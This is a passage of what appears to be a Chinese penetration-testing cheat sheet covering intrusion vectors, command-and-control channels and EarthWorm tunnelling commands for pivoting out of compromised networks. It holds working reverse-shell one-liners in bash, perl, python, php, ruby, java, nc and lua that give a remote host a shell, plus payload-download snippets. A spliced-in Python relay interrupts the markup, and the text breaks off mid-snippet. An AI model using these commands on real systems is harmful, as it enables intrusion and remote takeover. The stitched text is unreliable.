id="基于系统漏洞进入"><a href="#基于系统漏洞进入" class="headerlink" 
title="基于系统漏洞进入"></a>Via system vulnerabilities</h3><ul><li>Metasploit (exploitation framework):<a href="https://github.com/rapid7/metasploit-framework">https://github.com/rapid7/metasploit-framework</a> </li><li>Stand-alone exploit scripts</li></ul><h3 id="网站应用程序渗透"><a href="#网站应用程序渗透" class="headerlink" title="网站应用程序渗透"></a>Web application penetration</h3><ul><li>SQL injection </li><li>Cross-site scripting (XSS) </li><li>Cross-site request forgery (CSRF) </li><li>SSRF (<a href="https://github.com/bcoles/ssrf_proxy">ssrf_proxy</a>) </li><li>Functional and business-logic flaws </li><li>Other vulnerabilities </li><li>CMS (content management system) vulnerabilities </li><li>Proxies the enterprise runs itself</li></ul><h3 id="无线Wi-Fi接入"><a href="#无线Wi-Fi接入" class="headerlink" title="无线Wi-Fi接入"></a>Wireless (Wi-Fi) access</h3><h2 id="隐匿攻击"><a href="#隐匿攻击" class="headerlink" title="隐匿攻击"></a>Covert attack channels</h2><h3 id="Command-and-Control"><a href="#Command-and-Control" class="headerlink" title="Command and Control"></a>Command and Control</h3><ul><li>ICMP :<a href="https://pentestlab.blog/2017/07/28/command-and-control-icmp/">https://pentestlab.blog/2017/07/28/command-and-control-icmp/</a></li><li>DNS :<a href="https://pentestlab.blog/2017/09/06/command-and-control-dns/">https://p​entestlab.blog/2017/09/06/command-and-control-dns/</a></li><li>DropBox :<a href="https://pentestlab.blog/2017/08/29/command-and-control-dropbox/">https://pentestlab.blog/2017/08/29/command-and-control-dropbox/</a></li><li>Gmail :<a href="https://pentestlab.blog/2017/08/03/command-and-control-gmail/">https://pentestlab.blog/2017/08/03/command-and-control-gmail/</a></li><li>Telegram :<a href="http://drops.xmd5.com/static/drops/tips-16142.html">http://drops.xmd5.com/static/drops/tips-16142.html</a></li><li>Twitter :<a href="https://pentestlab.blog/2017/09/26/command-and-control-twitter/">https://pentestlab.blog/2017/09/26/command-and-control-twitter/</a></li><li>Website Keyword :<a href="https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/">https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/</a></li><li>PowerShell :<a 
href="https://pentestlab.blog/2017/08/19/command-and-control-powershell/">https://pentestlab.blog/2017/08/19/command-and-control-powershell/</a></li><li>Windows COM :<a href="https://pentestlab.blog/2017/09/01/command-and-control-windows-com/">https://pentestlab.blog/2017/09/01/command-and-control-windows-com/</a></li><li>WebDAV :<a href="https://pentestlab.blog/2017/09/12/command-and-control-webdav/">https://pentestlab.blog/2017/09/12/command-and-control-webdav/</a></li><li>Office 365 :<a href="https://www.anquanke.com/post/id/86974">https://www.anquanke.com/post/id/86974</a></li><li>HTTPS :<a href="https://pentestlab.blog/2017/10/04/command-and-control-https/">https://pentestlab.blog/2017/10/04/command-and-control-https/</a></li><li>Kernel :<a href="https://pentestlab.blog/2017/10/02/command-and-control-kernel/">https://pentestlab.blog/2017/10/02/command-and-control-kernel/</a></li><li>Website :<a href="https://pentestlab.blog/2017/11/14/command-and-control-website/">https://pentestlab.blog/2017/11/14/command-and-control-website/</a></li><li>WMI :<a href="https://pentestlab.blog/2017/11/20/command-and-control-wmi/">https://pentestlab.blog/2017/11/20/command-and-control-wmi/</a></li><li>WebSocket :<a href="https://pentestlab.blog/2017/12/06/command-and-control-websocket/">https://pentestlab.blog/2017/12/06/command-and-control-websocket/</a></li><li>Images :<a href="https://pentestlab.blog/2018/01/02/command-and-control-images/">https://pentestlab.blog/2018/01/02/command-and-control-images/</a></li><li>Web Interface :<a href="https://pentestlab.blog/2018/01/03/command-and-control-web-interface/">https://pentestlab.blog/2018/01/03/command-and-control-web-interface/</a></li><li>JavaScript :<a href="https://pentestlab.blog/2018/01/08/command-and-control-javascript/">https://pentestlab.blog/2018/01/08/command-and-control-javascript/</a></li><li>…</li></ul><h3 id="Fronting"><a href="#Fronting" class="headerlink" title="Fronting"></a>Fronting</h3><ul><li><a 
href="https://evi1cg.me/archives/Domain_Fronting.html">Domain Fronting </a></li><li><a href="https://evi1cg.me/archives/Tor_Fronting.html">Tor Fronting</a></li></ul><h3 id="代理"><a href="#代理" class="headerlink" title="代理"></a>Proxies</h3><ul><li>VPN </li><li>shadowsocks :<a href="https://github.com/shadowsocks">https://github.com/shadowsocks</a></li><li>HTTP :<a href="http://cn-proxy.com/">http://cn-proxy.com/</a></li><li>Tor</li></ul><h2 id="内网跨边界应用"><a href="#内网跨边界应用" class="headerlink" title="内网跨边界应用"></a>Crossing the intranet boundary</h2><h3 id="内网跨边界转发"><a href="#内网跨边界转发" class="headerlink" title="内网跨边界转发"></a>Port forwarding across the boundary</h3><ul><li><a href="https://blog.csdn.net/l_f0rm4t3d/article/details/24004555">NC port forwarding</a> </li><li><a href="http://blog.chinaunix.net/uid-53401-id-4407931.html">LCX port forwarding </a></li><li><a href="https://github.com/cnlh/nps">nps</a> -> personally I find this one fairly stable ~</li><li><a href="https://github.com/fatedier/frp">frp</a></li><li>Proxy scripts <ol><li><a href="https://github.com/SECFORCE/Tunna">Tunna </a></li><li><a href="https://github.com/sensepost/reDuh">Reduh </a></li></ol></li><li>…</li></ul><h3 id="内网跨边界代理穿透"><a href="#内网跨边界代理穿透" class="headerlink" title="内网跨边界代理穿透"></a>Proxy tunnelling across the boundary</h3><h4 id="EW"><a href="#EW" class="headerlink" title="EW"></a><a href="https://rootkiter.com/EarthWorm/">EW</a></h4><p>Forward SOCKS v5 server (listen on port 1080 of the compromised host and proxy through it):</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">./ew -s ssocksd -l 1080</span></span></code></pre></div><p>Reverse SOCKS v5 server:<br>a) First, on a host A that has a public IP, run (1080 is where SOCKS clients will connect, 8888 is where the target will dial in):</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s rcsocks -l 1080 -e 8888 </span></span><span class="line"><span 
style="color: #babed8"></span></span></code></pre></div><p>b) On the target host B, start the SOCKS v5 service and bounce it back to port 8888 on the public host (1.1.1.1 stands for host A's public IP):</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s rssocks -d 1.1.1.1 -e 8888 </span></span></code></pre></div><p>Multi-level cascading (listener on the public host 1.1.1.1, a transit hop, and the slave on the inner host dialling out to both):</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s lcx_listen -l 1080 -e 8888</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999</span></span></code></pre></div><p>Usage of lcx_tran (listen on 1080 and forward every connection to the SOCKS server on 127.0.0.1:9999):</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s ssocksd -l 9999</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999</span></span></code></pre></div><p>Usage of lcx_listen and lcx_slave (the listener waits for clients on 1080 and for the slave on 8888; the slave dials out to both the listener and the SOCKS server and bridges them):</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s lcx_listen -l 1080 -e 8888</span></span><span class="line"><span style="color: #babed8">$ ./ew -s ssocksd -l 9999</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 
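9999</span></span></code></pre></div><p>Stripped of EW's option names, those roles are plain TCP relaying: <code>lcx_tran</code> accepts clients on <code>-l</code> and connects each of them to <code>-f</code>:<code>-g</code>; <code>lcx_slave</code> runs on the inner host, dials out to the listener's <code>-e</code> port and to <code>-f</code>:<code>-g</code>, and bridges the two, which is what lets a host with no inbound access be reached at all. As an added example (this is not EW's code and not from the original page), a relay in Python that implements both roles on loopback; the echo service and the attacker-side listener are constructed stand-ins for the real service and for the <code>-e</code> side of <code>lcx_listen</code>, and all function names are hypothetical:</p>

```python
# Added example (not EW's code): the two relay roles behind lcx_tran and lcx_slave,
# standard library only. Function names are hypothetical.
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)   # forward the EOF, keep the other direction open
        except OSError:
            pass


def bridge(a, b):
    """Relay both directions between two connected sockets; returns when both are done."""
    t = threading.Thread(target=_pump, args=(a, b), daemon=True)
    t.start()
    _pump(b, a)
    t.join()
    a.close()
    b.close()


def tran(listen_port, target_host, target_port, listen_host="0.0.0.0"):
    """lcx_tran role (-l / -f -g): accept clients here, connect each one to the target.
    Returns the listening socket; getsockname() gives the bound port (0 = pick a free one)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def serve():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return                      # listener closed
            try:
                target = socket.create_connection((target_host, target_port))
            except OSError:
                client.close()              # target down: drop this client, keep serving
                continue
            threading.Thread(target=bridge, args=(client, target), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def slave(listen_host, listen_port, target_host, target_port):
    """lcx_slave role (-d -e / -f -g): from inside, dial out to the listener's -e port and
    to the target, then bridge them so the inner host needs no inbound port at all."""
    outer = socket.create_connection((listen_host, listen_port))
    inner = socket.create_connection((target_host, target_port))
    t = threading.Thread(target=bridge, args=(outer, inner), daemon=True)
    t.start()
    return t


def echo_service():
    """Constructed stand-in for the intranet service behind the relay: echoes its input."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def _send_and_collect(sock, payload):
    sock.sendall(payload)
    sock.shutdown(socket.SHUT_WR)          # our EOF travels through the relay to the service
    return b"".join(iter(lambda: sock.recv(4096), b""))


def round_trip_tran(payload=b"hello via tran\n"):
    """client -> tran relay -> echo service, all on loopback; returns what came back."""
    svc = echo_service()
    relay = tran(0, "127.0.0.1", svc.getsockname()[1], listen_host="127.0.0.1")
    with socket.create_connection(relay.getsockname()) as c:
        got = _send_and_collect(c, payload)
    relay.close()
    svc.close()
    return got


def round_trip_slave(payload=b"hello via slave\n"):
    """attacker-side listener (stand-in for lcx_listen's -e port) <- slave -> echo service."""
    svc = echo_service()
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    slave("127.0.0.1", listener.getsockname()[1], "127.0.0.1", svc.getsockname()[1])
    conn, _ = listener.accept()             # the slave dialled in; talk to the service through it
    with conn:
        got = _send_and_collect(conn, payload)
    listener.close()
    svc.close()
    return got


if __name__ == "__main__":
    print(round_trip_tran())
    print(round_trip_slave())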
9999</span></span></code></pre></div><p>“三级级联”的本地SOCKS测试用例以供参考</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s rcsocks -l 1080 -e 8888</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_listen -l 9999 -e 7777</span></span><span class="line"><span style="color: #babed8">$ ./ew -s rssocks -d 127.0.0.1 -e 7777</span></span></code></pre></div><h4 id="Termite"><a href="#Termite" class="headerlink" title="Termite"></a><a href="https://rootkiter.com/Termite/">Termite</a></h4><p>使用说明:<a href="https://rootkiter.com/Termite/README.txt">https://rootkiter.com/Termite/README.txt</a> </p><h4 id="代理脚本"><a href="#代理脚本" class="headerlink" title="代理脚本"></a>代理脚本</h4><p>reGeorg :<a href="https://github.com/sensepost/reGeorg">https://github.com/sensepost/reGeorg</a><br>Neo-reGeorg:<a href="https://github.com/L-codes/Neo-reGeorg">https://github.com/L-codes/Neo-reGeorg</a><br>pystinger(毒刺):<a href="https://github.com/FunnyWolf/pystinger">https://github.com/FunnyWolf/pystinger</a><br>ABPTTS:<a href="https://github.com/nccgroup/ABPTTS">https://github.com/nccgroup/ABPTTS</a></p><h3 id="shell反弹"><a href="#shell反弹" class="headerlink" title="shell反弹"></a>shell反弹</h3><p>bash </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">bash -i >& /dev/tcp/10.0.0.1/8080 0>&1</span></span></code></pre></div><p>perl </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki 
material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'</span></span></code></pre></div><p>python </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span></span></code></pre></div><p>php </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'</span></span></code></pre></div><p>ruby </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'</span></span></code></pre></div><p>java </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">r = Runtime.getRuntime()</span></span><span class="line"><span style="color: 
#babed8">p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])</span></span><span class="line"><span style="color: #babed8">p.waitFor()</span></span></code></pre></div><p>nc </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#使用-e </span></span><span class="line"><span style="color: #babed8">nc -e /bin/sh 223.8.200.234 1234 </span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#不使用-e</span></span><span class="line"><span style="color: #babed8">mknod /tmp/backpipe p</span></span><span class="line"><span style="color: #babed8">/bin/sh 0/tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe</span></span></code></pre></div><p>lua </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"</span></span></code></pre></div><h3 id="内网文件的传输和下载"><a href="#内网文件的传输和下载" class="headerlink" title="内网文件的传输和下载"></a>内网文件的传输和下载</h3><p>wput </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wput dir_name ftp://linuxpig:123456@host.com/</span></span></code></pre></div><p>wget 
</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wget http://site.com/1.rar -O 1.rar</span></span></code></pre></div><p>ariac2(需安装) </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2</span></span></code></pre></div><p>powershell</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$p = New-Object System.Net.WebClient </span></span><span class="line"><span style="color: #babed8">$p.DownloadFile("http://domain/file","C:%homepath%file") </span></span></code></pre></div><p>vbs脚本 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">Set args = Wscript.Arguments</span></span><span class="line"><span style="color: #babed8">Url = "http://domain/file"</span></span><span class="line"><span style="color: #babed8">dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")</span></span><span class="line"><span style="color: #babed8">dim bStrm: Set bStrm = createobject("Adodb.Stream")</span></span><span class="line"><span style="color: #babed8">xHttp.Open "GET", Url, False</span></span><span class="line"><span style="color: #babed8">xHttp.Send</span></span><span class="line"><span style="color: #babed8">with 
bStrm</span></span><span class="line"><span style="color: #babed8">.type = 1 '</span></span><span class="line"><span style="color: #babed8">.open</span></span><span class="line"><span style="color: #babed8">.write xHttp.responseBody</span></span><span class="line"><span style="color: #babed8">.savetofile " C:\%homepath%\file", 2 '</span></span><span class="line"><span style="color: #babed8">end with</span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 
13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行 :cscript test.vbs</p></blockquote><p>Perl </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!/usr/bin/perl </span></span><span class="line"><span style="color: #babed8">use LWP::Simple; </span></span><span class="line"><span style="color: #babed8">getstore("http://domain/file", "file");</span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" 
stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行:perl test.pl</p></blockquote><p>Python </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!/usr/bin/python </span></span><span class="line"><span style="color: #babed8">import urllib2 </span></span><span class="line"><span style="color: #babed8">u = urllib2.urlopen('http://domain/file') </span></span><span class="line"><span style="color: #babed8">localFile = open('local_file', 'w') </span></span><span class="line"><span style="color: #babed8">localFile.write(u.read()) </span></span><span class="line"><span style="color: #babed8">localFile.close()</span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" 
stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行:python test.py</p></blockquote><p>Ruby </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!/usr/bin/ruby</span></span><span class="line"><span style="color: #babed8">require 'net/http'</span></span><span class="line"><span style="color: #babed8">Net::HTTP.start("www.domain.com") { |http|</span></span><span class="line"><span style="color: #babed8">r = http.get("/file")</span></span><span class="line"><span style="color: #babed8">open("save_location", "wb") { |file|</span></span><span class="line"><span style="color: #babed8">file.write(r.body)</span></span><span class="line"><span style="color: #babed8">}</span></span><span class="line"><span style="color: #babed8">}</span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 
14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行:ruby test.rb</p></blockquote><p>PHP </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"><?php</span></span><span class="line"><span style="color: #babed8">$url = 'http://www.example.com/file';</span></span><span class="line"><span style="color: #babed8">$path = '/path/to/file';</span></span><span class="line"><span style="color: #babed8">$ch = curl_init($url);</span></span><span class="line"><span style="color: #babed8">curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);</span></span><span class="line"><span style="color: #babed8">$data = curl_exec($ch);</span></span><span class="line"><span style="color: 
